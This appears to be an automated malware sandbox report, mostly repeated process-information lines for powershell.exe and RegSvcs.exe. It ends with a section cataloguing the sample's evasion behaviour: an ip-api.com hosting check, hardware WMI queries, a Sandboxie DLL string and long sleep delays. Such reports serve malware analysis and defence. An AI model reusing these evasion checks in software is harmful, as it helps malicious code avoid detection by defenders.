                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\unspattered\recomplaint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\unspattered\recomplaint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exe Process information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\AppData\Local\unspattered\recomplaint.exe API/Special instruction interceptor: Address: 401E2B4
                    Source: C:\Users\user\AppData\Local\unspattered\recomplaint.exe API/Special instruction interceptor: Address: 408E2B4
                    Source: RegSvcs.exe, 00000008.00000002.2557012499.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2567429663.0000000003414000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.3370850966.0000000002944000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
                    Source: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exe Memory allocated: E50000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exe Memory allocated: 27E0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exe Memory allocated: 47E0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exe Memory allocated: 27C0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exe Memory allocated: 2850000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exe Memory allocated: 4850000 memory reserve | memory write watch
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 600000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599890
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599781
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599672
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599562
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599452
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599336
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599218
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599102
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598984
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598874
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596218
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 600000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599889
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599777
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599661
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599547
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599422
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599312
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599203
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599078
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598969
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596047
                    Source: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4960
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4845
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Window / User API: threadDelayed 3019
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Window / User API: threadDelayed 6798
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Window / User API: threadDelayed 2762
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Window / User API: threadDelayed 7057
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3548 Thread sleep time: -11990383647911201s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exe TID: 2612 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exe TID: 3636 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 100000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 99875
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 99766
